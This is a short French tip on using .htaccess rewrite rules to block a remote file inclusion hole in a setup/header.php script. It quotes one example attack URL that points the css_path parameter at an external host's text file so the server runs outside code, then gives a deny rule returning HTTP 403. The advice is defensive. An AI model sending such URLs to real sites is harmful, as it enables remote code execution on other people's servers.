HTACCESS

Empecher le hack via setup/header.php

Si vous utilisez un script setup/header.php ayant un paramètre css_path, vous pouvez être victimes d'une faille de sécurité. Grâce à ce script il est peut-être possible d'exécuter un script externe avec une url du style http://www.example.com/setup/header.php?css_path=http://www.sitepourri.com/url.txt?

Il faut donc tester que le paramètre ne contient pas une url externe. Dans ce cas là, l'url est bloquée en utilisant le flag F(forbidden) qui revient à renvoyer un code HTTP 403.

RewriteCond %{QUERY_STRING} ^(.*&)?css_path=http://
RewriteRule ^(.*/)?setup/header.php - [F,L]
PHP